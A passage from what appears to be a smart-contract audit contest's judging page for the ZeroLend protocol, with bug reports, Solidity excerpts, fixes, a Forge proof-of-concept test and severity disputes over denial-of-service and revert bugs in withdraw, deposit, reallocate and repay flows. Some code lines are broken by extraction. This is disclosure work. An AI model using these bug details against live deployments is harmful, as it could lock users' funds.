Finally, the point you make about AAVE accruing interest on treasury shares is not directly applicable to Zerolend because AAVE have removed executeMintToTreasury()
from the pool withdraw flow shown here and here.
As a result, AAVEE need not worry about treasury fees being stored in shares because they won't DOS withdrawals.
EDIT: for clarity I do conceed that impact 1 of this report by itself is low/info severity. But the fix for impact 1 also fixes DOSed withdrawals so it's closely related to impact 2 which is medium severity and matches the grouped family.
I agree with @Nihavent comment that this issue can remain a duplicate with the others because it has caught the root cause, which the other issues have reported, and the second impact is the same as the other issues(withdrawal DoS).
Also, from the escalation, I agree that #240 does not belong in this group but in the #101 group.
Planning to reject the escalation of this issue(#430) to be invalid, but I'll duplicate #240 with #101.
@cvetanovv This issue is invalid.
The root cause of this issue as described by the watsons is that executeMintToTreasury
will revert when a user attempts to withdraw all the liquidity from a pool.
This is intended, consider the following scenario that assumes a 10% reserve factor:
While the 0.1 ETH is in the pool, it is not available liquidity for lenders to withdraw. It is reserved for the treasury
”4. Currently there is 6 ETH in the pool, If the lender attempts to withdraw 6 ETH it will revert which is intended because 0.1 ETH belongs to the treasury”
In this example the lender has supply shares equal in value to 10.9 ETH, why should a withdrawal of 6 ETH revert when the pool has 6 ETH of liquidity?
Yes the treasury holds supply shares equal to 0.1 ETH. These supplyShares are the same as any other supplyShares and should not need to be provisioned for in every single withdrawal.
What if treasuryShares are worth 2 ETH, a pool has 3 ETH of liquidity and a user who holds supplyShares worth 2 ETH attempts to withdraw 2 ETH. Why should this revert?
”The root cause of this issue as described by the watsons is that executeMintToTreasury will revert when a user attempts to withdraw all the liquidity from a pool.”
Not necessarily, the example I just gave shows a user attempting to withdraw less than all the liquidity available and still facing a revert.
Note that Aave fixed this issue by removing ‘executeMintToTreasury’ from the withdrawal flow as I described here
The pool has 6 ETH worth of liquidity, but 0.1 ETH is reserved for the treasury. Due to the reserve factor of 10%. Clearly these funds meant for the treasury should not be withdrawable by lenders.
” Clearly these funds meant for the treasury should not be withdrawable by lenders.”
It is completely misleading to suggest that lenders are trying to withdraw treasury funds. They’re only trying to withdraw their funds.
The issue is clearly visible in pools with low liquidity and accumulating treasury fees such as this example:
” What if treasuryShares are worth 2 ETH, a pool has 3 ETH of liquidity and a user who holds supplyShares worth 2 ETH attempts to withdraw 2 ETH.”
Where a withdrawal of any amount exceeding 1 ETH is DOSed until a repayment/deposit is made that covers the withdrawal amount and all treasury fees (which continue to accumulate). Note if the asset value of the treasury shares exceeds the available liquidity in the pool all withdrawals are DOSed.
It seems like you’re making the variable name ‘reserveFactor’ do too much work. If these funds were truly intended to be reserved, they would not be borrowable.
This issue was fixed in Aave for a reason, I’m yet to see a compelling argument why it’s not an issue in Zerolend
I believe this issue and its duplicates (excluding #240) are valid because the accumulation of treasury fees could ultimately result in a situation where all withdrawals from the pool are DOSed.
This occurs when the total accrued treasury fees exceed the available liquidity in the pool, thereby preventing suppliers from withdrawing their assets until the pool is replenished.
As @Nihavent has pointed out, Aave resolved this issue by excluding ‘executeMintToTreasury’ from the withdrawal flow.
My previous decision to reject escalation remains. I will only invalidate #240
@cvetanovv The treasury fees is 10% of the interest paid on loans. This is orders of magnitude smaller than the principal liquidity of the pool. It is not realistic at all for the treasury fees to exceed the available liquidity in the pool unless the pool has > 99% utilization so there is barely anything left. This edge case will not last long at all since the borrower will have a huge interest rate to pay so the DOS will be well below 7 days and the lenders will receive huge yield for that period.
Furthermore every time a single successful withdrawal occurs, the treasury fees reset to 0. This makes it even harder to accumulate an amount to cause a DOS.
"It is not realistic at all for the treasury fees to exceed the available liquidity in the pool unless the pool has > 99% utilization so there is barely anything left. This edge case will not last long at all since the borrower will have a huge interest rate to pay so the DOS will be well below 7 days and the lenders will receive huge yield for that period."
Your comment is making a lot of assumptions given high utilization is a completely valid pool state. There are a variety of IRMs and varying incentives for users.
where the 'debtSlope' settings are not high enough. In these pools, the utilization has minimal impact on rates and users have little incentive to repay quickly.FixedInterestRateStrategy
. Your comment gives no consideration to extended DOS in pools with fixed rate stratergies."Furthermore every time a single successful withdrawal occurs, the treasury fees reset to 0. This makes it even harder to accumulate an amount to cause a DOS."
The issue is no withdrawal can occur when accumulated treasury shares exceed pool liquidity.
I agree with @Nihavent comment, and my previous decision remains:\#issuecomment-2435074872
Has duplicates
Escalations have been resolved successfully!
Escalation status:
does not consider the pool cap of the underlying pool, which may cause deposit()
to revert or lead to an unintended reordering of supplyQueue
Bigsam, Nihavent, wellbyt3
The curated vault's _supplyPool()
function deposits assets into the underlying pools in supplyQueue
. Whilst it considers the curated vault's cap for a given pool, it does not consider the underlying pool's internal cap. As a result, some CuratedVault::deposit()
transactions will revert due to running out of pools to deposit to, or the liquidity will be allocated to the supplyQueue
in a different order.
is called in the deposit flow of the curated vault. As shown below, it attempts to deposit the minimum of assets
and supplyCap - supplyAssets
(which is the 'available curated pool cap' for this pool).
function _supplyPool(uint256 assets) internal { for (uint256 i; i < supplyQueue.length; ++i) { IPool pool = supplyQueue[i]; uint256 supplyCap = config[pool].cap; if (supplyCap == 0) continue; pool.forceUpdateReserve(asset()); uint256 supplyShares = pool.supplyShares(asset(), positionId); // `supplyAssets` needs to be rounded up for `toSupply` to be rounded down. (uint256 totalSupplyAssets, uint256 totalSupplyShares,,) = pool.marketBalances(asset()); @> uint256 supplyAssets = supplyShares.toAssetsUp(totalSupplyAssets, totalSupplyShares); @> uint256 toSupply = UtilsLib.min(supplyCap.zeroFloorSub(supplyAssets), assets); if (toSupply > 0) { // Using try/catch to skip markets that revert. try pool.supplySimple(asset(), address(this), toSupply, 0) { assets -= toSupply; } catch {} } if (assets == 0) return; } if (assets != 0) revert CuratedErrorsLib.AllCapsReached(); }
However, the function does not consider an underlying pool's supplyCap
. Underlying pools have their own supplyCap
which will cause supply()
calls to revert if they would put the pool over it's supplyCap
function validateSupply( DataTypes.ReserveCache memory cache, DataTypes.ReserveData storage reserve, DataTypes.ExecuteSupplyParams memory params, DataTypes.ReserveSupplies storage totalSupplies ) internal view { ... SKIP!... uint256 supplyCap = cache.reserveConfiguration.getSupplyCap(); require( supplyCap == 0 @> || ((totalSupplies.supplyShares + uint256(reserve.accruedToTreasuryShares)).rayMul(cache.nextLiquidityIndex) + params.amount) <= supplyCap * (10 ** cache.reserveConfiguration.getDecimals()), PoolErrorsLib.SUPPLY_CAP_EXCEEDED ); }
Also note that the pool::supplySimple()
call in _supplyPool()
is wrapped in a try/catch block, so if a pool::supplySimple()
call were to revert, it will just continue to the next pool.
call needs to be within the limits of the curated vault's cap (config[pool].cap
) but exceed the limits of the underlying pool's supplyCap
.No response
of 100e18 and is currently at 99e18.supplyCap
of 100e18 and is currently at 99e18.deposit()
on the curated vault with a value of 2e18.config[pool].cap
for either pool.Pool::supplySimple()
will silently revert on both pools, and the entire transaction will revert due to running out of available pools to supply the assets toDeposit Reverts
, but is too large to be added to any one of these underlying pools, the deposit will completely revert, despite the underlying pools having capacity to accept the deposit.Inefficient reorder of supplyQueue
, but would exceed the limits an underlying pool in supplyQueue
. Then the silent revert would skip this pool and attempt to deposit it's liquidity to the next pool in the queue. This is an undesired/inefficient reordering of the supplyQueue
as a simple check on the cap of the underlying pool would reveal some amount that would be accepted by the underlying pool.No response
Create an external getter for a pool's supply cap, similar to ReserveConfiguration::getSupplyCap()
the next function should also scale the supply cap by the reserve token's decimals.
Then, add an extra check in CuratedVaultSetters::_supplyPool()
as shown below.
function _supplyPool(uint256 assets) internal { for (uint256 i; i < supplyQueue.length; ++i) { IPool pool = supplyQueue[i]; uint256 supplyCap = config[pool].cap; if (supplyCap == 0) continue; pool.forceUpdateReserve(asset()); uint256 supplyShares = pool.supplyShares(asset(), positionId); // `supplyAssets` needs to be rounded up for `toSupply` to be rounded down. (uint256 totalSupplyAssets, uint256 totalSupplyShares,,) = pool.marketBalances(asset()); uint256 supplyAssets = supplyShares.toAssetsUp(totalSupplyAssets, totalSupplyShares); uint256 toSupply = UtilsLib.min(supplyCap.zeroFloorSub(supplyAssets), assets); + toSupply = UtilsLib.min(toSupply, pool.getSupplyCap(pool.getConfiguration(asset())) - totalSupplyAssets ); if (toSupply > 0) { // Using try/catch to skip markets that revert. try pool.supplySimple(asset(), address(this), toSupply, 0) { assets -= toSupply; } catch {} } if (assets == 0) return; } if (assets != 0) revert CuratedErrorsLib.AllCapsReached(); }
1 comment(s) were left on this issue during the judging contest.
Honour commented:
Invalid: see comment on #193
This report should be valid and is not a duplicate of which is about maxWithdraw
and maxRedeem
being non-ERC4626 compliant due to a bug in \_withdrawable()
On the other hand, this report describes that \_supplyPool()
ignoring the underlying pool cap can result in unexpectedly reverting deposits or an inefficient reordering of the supplyQueue.
To address the comment left on that was referenced on this report:
"setCap is an admin operation and It can be expected that the curators will set (there's no reason to assume otherwise) a similar pool(vault) cap as the underlying pool"
I believe there is a flaw in this reasoning.
stored in CuratedVaultStorage::config[pool].cap
is the cap of deposits into a given underlying pool from this CuratedVault
for the underlying pool describes the total deposits to this underlying pool from all sources (including but not limited to this CuratedVault
).It's true the curator sets the supplyCap
for the curated vault, however they are not in control of other deposts to the underlying pool. So, attempting to set them to similar values will only prevent this issue as long as there are no other deposits in the underlying pool, which is not a valid assumption for a curator to make.
Therefore both impacts in this report can occur regardless of the admin-set value.
This report should be valid and is not a duplicate of which is about
being non-ERC4626 compliant due to a bug in\_withdrawable()
On the other hand, this report describes that\_supplyPool()
ignoring the underlying pool cap can result in unexpectedly reverting deposits or an inefficient reordering of the supplyQueue.To address the comment left on that was referenced on this report:
"setCap is an admin operation and It can be expected that the curators will set (there's no reason to assume otherwise) a similar pool(vault) cap as the underlying pool"
I believe there is a flaw in this reasoning.
- The
stored inCuratedVaultStorage::config[pool].cap
is the cap of deposits into a given underlying pool from thisCuratedVault
.- The underlying pool cap stored in the
for the underlying pool describes the total deposits to this underlying pool from all sources (including but not limited to thisCuratedVault
).It's true the curator sets the
for the curated vault, however they are not in control of other deposts to the underlying pool. So, attempting to set them to similar values will only prevent this issue as long as there are no other deposits in the underlying pool, which is not a valid assumption for a curator to make.Therefore both impacts in this report can occur regardless of the admin-set value.
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
@Nihavent The impact is very similar to issues #337 and #431.
You can see this comment:\#issuecomment-2402013737
I see no reason for it to be any different here.
@cvetanovv the root cause is similar to the issues you referenced but the impact here is higher.
The maximum impact on the issues you linked is non compliance with the EIP which can break external integrations, as you mentioned this does not necessarily qualify as medium impact.
The maximum impact on this issue is reverting deposits when the pools have capacity to support the deposit (see attack path). This is an implementation bug which is broken contract functionality.
Additionally, assets can be allocated to underlying pools in an order which differs from the depositQueue.
This issue has nothing to do with EIP compliance.
For reference this issue has the same root cause and impact as
@Nihavent I agree that in this issue, the impact is one idea more serious, and we enter the category "broken contract functionality".
Planning to accept the escalation and remove the duplication with #399. I will duplicate this issue(#433) with #193 and #339. This issue will be the main.
Hi @cvetanovv, please consider the following judging comment regarding why this issue is invalid.
Vault curators should not set a cap that is greater than the cap of underlying pools. It makes no sense to do so. For example if the underlying pool allows a max of 10e18
, then vault curators should set a deposit cap that is less than or equal to 10e18. This issue requires vault curators to set a cap that is higher than the underlying pool's cap, so is invalid.
Hi @cvetanovv, please consider the following judging comment regarding why this issue is invalid.
Vault curators should not set a cap that is greater than the cap of underlying pools. It makes no sense to do so. For example if the underlying pool allows a max of
, then vault curators should set a deposit cap that is less than or equal to 10e18. This issue requires vault curators to set a cap that is higher than the underlying pool's cap, so is invalid.
This is not true as I explained here\#issuecomment-2391351629
Imagine the super pool has 2 underlying pools each with an underlying cap of 10e18. The SuperPool admin sets their caps to 10e18 as you said. Each underlying pool receives deposits from other sources to the value of 9e18. Now a user trying to deposit 2e18 into the SuperPool will revert even though this deposit could be split across the two underlying pools.
Therefore carefully setting the SuperPool cap for a given pool is only an effective mitigation if there are 0 deposits from other sources in the underlying pool. As I previously mentioned this is an unrealistic assumption for anyone to make.
”This issue requires vault curators to set a cap that is higher than the underlying pool's cap, so is invalid.”
This is also incorrect because in the above example the SuperPool cap set for the two pools could be 5e18 and the issue still exists.
I believe this is straightforward but if you require a POC showing the issue when the SuperPool cap is < the underlying pool cap I can write one tomorrow.
Yeah actually you're right @Nihavent, the issue can still occur. I still think that the issue would not exist if vault curators set an appropriate cap, and that is why Morpho decided to implement it this way. In the case that an event like the described one occurs, the curators can reduce the cap of the pool such that only 1e18 can be deposited into each pool, and this prevents the revert.
That is the reason why submitCap()
has no timelock for reducing a pool cap, but does have a timelock for increasing the pool cap. It's because reducing pool caps should be able to happen to prevent the described issue.
Edit: Updated this comment with a more considered and complete response.
@0xjuaan thanks for acknowledging the example I provided which shows the issue is possible regardless of carefuly set admin values. I do concede this issue is less likely to occur (but not impossible) if the admin continuously sets conservatively low SuperPool caps for the underlying pools (relative to available caps in the underlying pools). However, I will now explain why I don't believe the SuperPool cap should or would ever be used for this purpose.
There are two relevant caps we're discussing:
We can make inferences from the fact that these two caps exist:
This comment suggests that a partial mitigation to this issue is to burden SuperPool curators with administrative work of continuously checking for a reduction in available cap in all underlying pools, and reducing the corresponding SuperPool cap to reflect this change. The evidence given for this is there is no timelock on reduction in superPool caps. I believe there are problems with this:
calls with submitCap()
calls.So whilst it’s technically possible to reduce the likelihood of this issue with admin actions, it is unreasonable to expect the admin to use the parameter for this purpose.
I also believe this issue is not worth a medium severity, submitCap()
is an admin operation and it has been shown that the protocol is designed in such a way that its easy for the admin to handle this if it ever happens (and the chances of it happening are vey slim if the admin sets a reasonable cap to begin with)
I also believe this issue is not worth a medium severity,
is an admin operation and it has been shown that the protocol is designed in such a way that its easy for the admin to handle this if it ever happens (and the chances of it happening are vey slim if the admin sets a reasonable cap to begin with)
I agree the issue is not going to occur frequently due to it being a bug that occurs in edge cases. To my knowledge the likelihood of the bug does not play a role in Sherlock’s judging rules.
Check my previous comment for an explanation as to why setCap would need to be misused to reduce the likihood of this bug.
It has also been shown that this issue can occur regardless of admin set values.
I believe this issue should be Low severity.
While it could lead to some deposit reverts or inefficiencies in the supplyQueue
, it's important to note that this is an admin-controlled action. Admins have the ability to set reasonable caps and monitor pool configurations effectively to prevent such situations.
Additionally, there is no direct loss of funds.
For these reasons, I believe that this issue is of low severity.
Planning to reject the escalation and leave the issue as is.
Hi, thanks for consideration of the issue.
It has been shown that this issue can occur regardless of the most reasonable admin setCap value. This is because the available liquidity in underlying pools can change quickly.
For this parameter to be used in a way to almost completely avoid this issue, the cap would need to be set extremely low which defeats the purpose of the pool being in the supply queue.
Additionally, as I explained in detail here the setCap functionality should not and will not be used to reduce the likelihood of this issue.
Requiring curators to setCap to avoid this issue costs them the functionality of setting their optimal liquidity allocation to each pool, ie. they lose the intended functionality of the parameter in order to prevent edge-case deposit reverts. Therefore no rational actor would use the parameter in this way.
If the protocol didn’t want curators to be able to freely set caps, the parameter wouldn’t exist and vaults would inherit the available caps from the underlying pools.
As it stands, with admins freely setting their optimal caps as per the design, there is a bug in the implementation.
This issue is a low severity
There is no loss of funds or broken functionality or any substantial impact, the only issue here is a short/temporary inconvenience for the user that can be immediately and easily fixed by admin adjusting the cap or reordering the queue if necessary
This issue is а valid Low severity.
Here are the rules for Medium severity:\#v.-how-to-identify-a-medium-issue
- Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
- Breaks core contract functionality, rendering the contract useless or leading to loss of funds of the affected party larger than 0.01% and 10 USD.
In this issue, there is neither loss of funds nor broken functionality.
My decision to reject the escalation remains.
If this issue does not have enough impact for medium severity, how is this issue a valid medium?
I understand that reports will be judged on a case-by-case basis, but there is no meaningful difference between the protocols with respect to this issue, and the submitted issues are the same. Therefore for consistency if there is enough impact in that issue for medium, there must be enough impact in this issue for medium.
How are Watsons able to gauge which issues consistitue a medium if this level of consistency is not present?
@Nihavent You are right about that. As you can see in the comments, I was hesitant about having broken functionality. After the protocol comment, then I decided it was Medium because it was important for them to have the function not revert.
In this contract(CuratedVaultSetters.sol
), we also have indications that the function should not revert, so I think we have broken functionality here also:\#L133
Planning to accept the escalation and make this issue Medium.
Hi @cvetanovv 193 is also a duplicate of this issue.
Hi @cvetanovv 193 is also a duplicate of this issue.
Thanks for the mention. I will also duplicate #193 to this issue.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
a pool to zero due to attempting to withdraw 0 tokens from the underlying poolSource:
000000, 0xAristos, 0xc0ffEE, A2-security, KupiaSec, Nihavent, Obsidian, Varun_05, aman, dany.armstrong90, hyh, iamnmt, karsar, rilwan99, stuart_the_minion, theweb3mechanic, trachev, wickie, zarkk01
The reallocate()
function is the primary way a curated vault can remove liquidity from an underlying pool, so being unable to fully remove the liquidity is problematic. However, due to a logic issue in the implementation, any attempt to reallocate()
liquidity in a pool to zero will revert.
The function CuratedVault::reallocate()
is callable by an allocator and reallocates funds between underlying pools. As shown below, toWithdraw
is the difference between supplyAssets
(total assets in the underlying pool controlled by the curated vault) and the allocation.assets
which is the target allocation for this pool. Therefore, if toWithdraw
is greater than zero, a withdrawal is required from that pool:
function reallocate(MarketAllocation[] calldata allocations) external onlyAllocator { uint256 totalSupplied; uint256 totalWithdrawn; for (uint256 i; i < allocations.length; ++i) { MarketAllocation memory allocation = allocations[i]; IPool pool =; (uint256 supplyAssets, uint256 supplyShares) = _accruedSupplyBalance(pool); @> uint256 toWithdraw = supplyAssets.zeroFloorSub(allocation.assets); if (toWithdraw > 0) { if (!config[pool].enabled) revert CuratedErrorsLib.MarketNotEnabled(pool); // Guarantees that unknown frontrunning donations can be withdrawn, in order to disable a market. uint256 shares; if (allocation.assets == 0) { shares = supplyShares; @> toWithdraw = 0; } @> DataTypes.SharesType memory burnt = pool.withdrawSimple(asset(), address(this), toWithdraw, 0); emit CuratedEventsLib.ReallocateWithdraw(_msgSender(), pool, burnt.assets, burnt.shares); totalWithdrawn += burnt.assets; } else { ... SKIP!... } }
The issue arrises when for any given pool, allocation.assets
is set to 0, meaning the allocator wishes to empty that pool and allocate the liquidity to another pool. Under this scenario, toWithdraw
is set to 0, and passed into Pool::withdrawSimple()
. This is a logic mistake to attempt to withdraw 0 instead of the supplyAssets
when attempting to withdraw all liquidity to a pool. The call will revert due to a check in the pool's withdraw flow that ensures the amount being withdrawn is greater than 0.
It seems this bug is a result of forking the Metamorpho codebase which implements the same logic. However, Metamorpho's underlying withdraw() function can take either an asset amount or share amount, but ZeroLend's Pool::withdrawSimple()
only accepts an amount of assets.
No response
withdrawing all liquidity from the first pool and depositing the same amount to the second poolreallocate()
function. The natspec comments indicate that emptying a pool to zero through the reallocate()
function is the first step of the intended way to remove a pool.Paste and run the below test in /test/forge/core/vaults/. It shows a simple 2-pool vault with a single depositors. An allocator attempts to reallocate the liquidity in the first pool to the second pool, but reverts due to the described issue.
// SPDX-License-Identifier: GPL-2.0-or-later pragma solidity ^0.8.0; import {Math} from '@openzeppelin/contracts/utils/math/Math.sol'; import './helpers/IntegrationVaultTest.sol'; import {console2} from 'forge-std/src/Test.sol'; import {MarketAllocation} from '../../../../contracts/interfaces/vaults/ICuratedVaultBase.sol'; contract POC_AllocatorCannotReallocateToZero is IntegrationVaultTest { function setUp() public { _setUpVault(); _setCap(allMarkets[0], CAP); _sortSupplyQueueIdleLast(); oracleB.updateRoundTimestamp(); oracle.updateRoundTimestamp(); } function test_POC_AllocatorCannotReallocateToZero() public { // 1. supplier supplies to underlying pool through curated vault uint256 assets = 10e18;, assets); vm.startPrank(supplier); uint256 shares = vault.deposit(assets, onBehalf); vm.stopPrank(); // 2. Allocator attempts to reallocate all of these funds to another pool MarketAllocation[] memory allocations = new MarketAllocation[](2); allocations[0] = MarketAllocation({ market: vault.supplyQueue(0), assets: 0 }); // Fill in the second MarketAllocation struct allocations[1] = MarketAllocation({ market: vault.supplyQueue(1), assets: assets }); vm.startPrank(allocator); vm.expectRevert("NOT_ENOUGH_AVAILABLE_USER_BALANCE"); vault.reallocate(allocations); // Reverts due to attempting a withdrawal amount of 0 } }
The comment "Guarantees that unknown frontrunning donations can be withdrawn, in order to disable a market" does not seem to apply to Zerolend pools as a donation to the pool would not disable the market, nor would it affect the amount of assets the curated vault can withdraw from the underlying pool. With this in mind, Metamorpho's safety check can be removed:
function reallocate(MarketAllocation[] calldata allocations) external onlyAllocator { uint256 totalSupplied; uint256 totalWithdrawn; for (uint256 i; i < allocations.length; ++i) { MarketAllocation memory allocation = allocations[i]; IPool pool =; (uint256 supplyAssets, uint256 supplyShares) = _accruedSupplyBalance(pool); uint256 toWithdraw = supplyAssets.zeroFloorSub(allocation.assets); if (toWithdraw > 0) { if (!config[pool].enabled) revert CuratedErrorsLib.MarketNotEnabled(pool); - // Guarantees that unknown frontrunning donations can be withdrawn, in order to disable a market. - uint256 shares; - if (allocation.assets == 0) { - shares = supplyShares; - toWithdraw = 0; - } DataTypes.SharesType memory burnt = pool.withdrawSimple(asset(), address(this), toWithdraw, 0); emit CuratedEventsLib.ReallocateWithdraw(_msgSender(), pool, burnt.assets, burnt.shares); totalWithdrawn += burnt.assets; } else { uint256 suppliedAssets = allocation.assets == type(uint256).max ? totalWithdrawn.zeroFloorSub(totalSupplied) : allocation.assets.zeroFloorSub(supplyAssets); if (suppliedAssets == 0) continue; uint256 supplyCap = config[pool].cap; if (supplyCap == 0) revert CuratedErrorsLib.UnauthorizedMarket(pool); if (supplyAssets + suppliedAssets > supplyCap) revert CuratedErrorsLib.SupplyCapExceeded(pool); // The market's loan asset is guaranteed to be the vault's asset because it has a non-zero supply cap. IERC20(asset()).forceApprove(address(pool), type(uint256).max); DataTypes.SharesType memory minted = pool.supplySimple(asset(), address(this), suppliedAssets, 0); emit CuratedEventsLib.ReallocateSupply(_msgSender(), pool, minted.assets, minted.shares); totalSupplied += suppliedAssets; } } if (totalWithdrawn != totalSupplied) revert CuratedErrorsLib.InconsistentReallocation(); }
and repayETH()
are unavailable unless preceded atomically by an accounting updating operationSource:
000000, A2-security, JCN, Obsidian, denzi_, hyh, stuart_the_minion, thisvishalsingh, zarkk01
The check in _repay()
cannot be satisfied if pool state was not already updated by some other operation in the same block. This makes any standalone repay()
and repayETH()
calls revert, i.e. core repaying functionality can frequently be unavailable for end users since it's not packed with anything by default in production usage
Pool state wasn't updated before previousDebtBalance
was set:
/// @inheritdoc INFTPositionManager function repay(AssetOperationParams memory params) external { if (params.asset == address(0)) revert NFTErrorsLib.ZeroAddressNotAllowed(); IERC20Upgradeable(params.asset).safeTransferFrom(msg.sender, address(this), params.amount); >> _repay(params); } /// @inheritdoc INFTPositionManager function repayETH(AssetOperationParams memory params) external payable { params.asset = address(weth); if (msg.value != params.amount) revert NFTErrorsLib.UnequalAmountNotAllowed(); weth.deposit{value: params.amount}(); >> _repay(params); }
function _repay(AssetOperationParams memory params) internal nonReentrant { if (params.amount == 0) revert NFTErrorsLib.ZeroValueNotAllowed(); if (params.tokenId == 0) { if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner(); params.tokenId = _nextId - 1; } Position memory userPosition = _positions[params.tokenId]; IPool pool = IPool(userPosition.pool); IERC20 asset = IERC20(params.asset); asset.forceApprove(userPosition.pool, params.amount); >> uint256 previousDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); DataTypes.SharesType memory repaid = pool.repay(params.asset, params.amount, params.tokenId,; >> uint256 currentDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId);
function getDebt(address asset, address who, uint256 index) external view returns (uint256 debt) { bytes32 positionId = who.getPositionId(index); >> return _balances[asset][positionId].getDebtBalance(_reserves[asset].borrowIndex); }
But it was updated in pool.repay()
before repayment workflow altered the state:
function executeRepay( ... ) external returns (DataTypes.SharesType memory payback) { DataTypes.ReserveCache memory cache = reserve.cache(totalSupplies); >> reserve.updateState(params.reserveFactor, cache);
function updateState(DataTypes.ReserveData storage self, uint256 _reserveFactor, DataTypes.ReserveCache memory _cache) internal { // If time didn't pass since last stored timestamp, skip state update if (self.lastUpdateTimestamp == uint40(block.timestamp)) return; >> _updateIndexes(self, _cache); _accrueToTreasury(_reserveFactor, self, _cache); self.lastUpdateTimestamp = uint40(block.timestamp); }
function _updateIndexes(DataTypes.ReserveData storage _reserve, DataTypes.ReserveCache memory _cache) internal { ... if (_cache.currDebtShares != 0) { uint256 cumulatedBorrowInterest = MathUtils.calculateCompoundedInterest(_cache.currBorrowRate, _cache.reserveLastUpdateTimestamp); _cache.nextBorrowIndex = cumulatedBorrowInterest.rayMul(_cache.currBorrowIndex).toUint128(); >> _reserve.borrowIndex = _cache.nextBorrowIndex; }
This way the previousDebtBalance - currentDebtBalance
consists of state change due to the passage of time since last update and state change due to repayment:
function _repay(AssetOperationParams memory params) internal nonReentrant { if (params.amount == 0) revert NFTErrorsLib.ZeroValueNotAllowed(); if (params.tokenId == 0) { if (msg.sender != _ownerOf(_nextId - 1)) revert NFTErrorsLib.NotTokenIdOwner(); params.tokenId = _nextId - 1; } Position memory userPosition = _positions[params.tokenId]; IPool pool = IPool(userPosition.pool); IERC20 asset = IERC20(params.asset); asset.forceApprove(userPosition.pool, params.amount); uint256 previousDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); DataTypes.SharesType memory repaid = pool.repay(params.asset, params.amount, params.tokenId,; uint256 currentDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId); >> if (previousDebtBalance - currentDebtBalance != repaid.assets) { revert NFTErrorsLib.BalanceMisMatch(); }
can be stale and, in general, it is previousDebtBalance - currentDebtBalance = (actualPreviousDebtBalance - currentDebtBalance) - (actualPreviousDebtBalance - previousDebtBalance) = repaid.assets - {debt growth due to passage of time since last update} < repaid.assets
, where actualPreviousDebtBalance
is pool.getDebt()
result after reserve.updateState()
, but before repayment
Interest rate and debt are positive, so there is some interest accrual happens over time. This is normal (going concern) state of any pool
No other state updating operations were run since the last block
No direct attack needed in this case, a protocol malfunction causes loss to some users
Core system functionality, repay()
and repayETH()
, are unavailable whenever aren't grouped with other state updating calls, which is most of the times in terms of the typical end user interactions. Since the operation is time sensitive and is typically run by end users directly, this means that there is a substantial probability that unavailability in this case leads to losses, e.g. a material share of NFTPositionManager users cannot repay in time and end up being liquidated as a direct consequence of the issue (i.e. there are other ways to meet the risk, but time and investigational effort are needed, while liquidations will not wait).
Overall probability is medium: interest accrues almost always and most operations are stand alone (cumulatively high probability) and repay is frequently enough called close to liquidation (medium probability). Overall impact is high: loss is deterministic on liquidation, is equal to liquidation penalty and can be substantial in absolute terms for big positions. The overall severity is high
A user wants and can repay the debt that is about to be liquidated, but all the repayment transactions revert, being done straightforwardly at a stand alone basis, meanwhile the position is liquidated, bearing the corresponding penalty as net loss
Consider adding direct reserve update before reading from the state, e.g.:
+ pool.forceUpdateReserve(params.asset); uint256 previousDebtBalance = pool.getDebt(params.asset, address(this), params.tokenId);
shouldn't this be high severity because the only way to retrieve the stuck funds would be for each individual user to somehow atomically update the interest rate before repayment?
Final time to use this
Final time to use this
You've created a valid escalation!
To remove the escalation from consideration: Delete your comment.
You may delete or edit your escalation comment anytime before the 48-hour escalation window closes. After that, the escalation becomes final.
This is the High severity rule:
Definite loss of funds without (extensive) limitations of external conditions. The loss of the affected party must exceed 1%.
Causes a loss of funds but requires certain external conditions or specific states, or a loss is highly constrained. The loss of the affected party must exceed 0.01% and 10 USD.
Breaks core contract functionality, rendering the contract useless or leading to loss of funds of the affected party larger than 0.01% and 10 USD.
We can see that in this issue, we have no loss of funds without any constrains.
The main impact is that the repay()
functionality may not work in certain circumstances, and more matches the rule for Medium severity. : Breaks core contract functionality, rendering the contract useless or leading to loss of funds of the affected party
Planning to reject the escalation and leave the issue as is.
The reason why it's high severity is that the user will not be able to withdraw a certain amount of collateral, since they cant repay.
Lets say they deposit $100 and borrow $80. (LTV is 80%)
Now they cant repay the $80, so their $100 is stuck forever. So they effectively lost $20.
@0xjuaan How it's stuck I don't understand ? It will revert after if statement.
@DemoreXTess repayment reverts, so they cant withdraw their collateral (they need to repay debt in order to withdraw collateral), so they lose funds since collateral value > debt value
I believe this issue is low severity.
The user can call pool.forceUpdateReserve
before repay
and repayETH
to update the borrowIndex
, and then the repayment will not revert. If the user fails to do so, then it is a user mistake.
As I wrote in my previous comment repay()
and repayETH()
do not work as they should. This is the main impact and because of this, I classify this issue as Medium severity. We have broken functionality.
My decision to reject the escalation remains.
Has duplicates
Escalations have been resolved successfully!
Escalation status:
Obsidian, dany.armstrong90, ether_sky
Users can supply
to the pools
through the NFTPositionManager
to earn rewards
in zero
Functions like deposit
, withdraw
, repay
, and borrow
should operate normally.
However, due to an additional check, repayments
might be reverted.
Here's the relationship between shares
) and assets
) in the Pool
a = [(s * I + 10^27 / 2) / 10^27] (rayMul)
function rayMul(uint256 a, uint256 b) internal pure returns (uint256 c) { assembly { if iszero(or(iszero(b), iszero(gt(a, div(sub(not(0), HALF_RAY), b))))) { revert(0, 0) } c := div(add(mul(a, b), HALF_RAY), RAY) } }
s = [(a * 10^27 + I / 2) / I] (rayDiv)
function rayDiv(uint256 a, uint256 b) internal pure returns (uint256 c) { assembly { if or(iszero(b), iszero(iszero(gt(a, div(sub(not(0), div(b, 2)), RAY))))) { revert(0, 0) } c := div(add(mul(a, RAY), div(b, 2)), b) } }
Numerical Example:
Suppose there is a pool
where users borrow
using the NFTPositionManager
borrow index
of P
is 2 * 10^27
, and the share
is 5
.previous debt balance
is as below (Line 119
):previousDebtBalance = [(s * I + 10^27 / 2) / 10 ^27] = [(5 * 2 * 10^27 + 10^27 / 2) / 10^27] = 10
is:[(a * 10^27 + I / 2) / I] = [(3 * 10^27 + 2 * 10^27 / 2) / (2 * 10^27)] = 2
is:5 - 2 = 3
current debt balance
is as below (Line 121
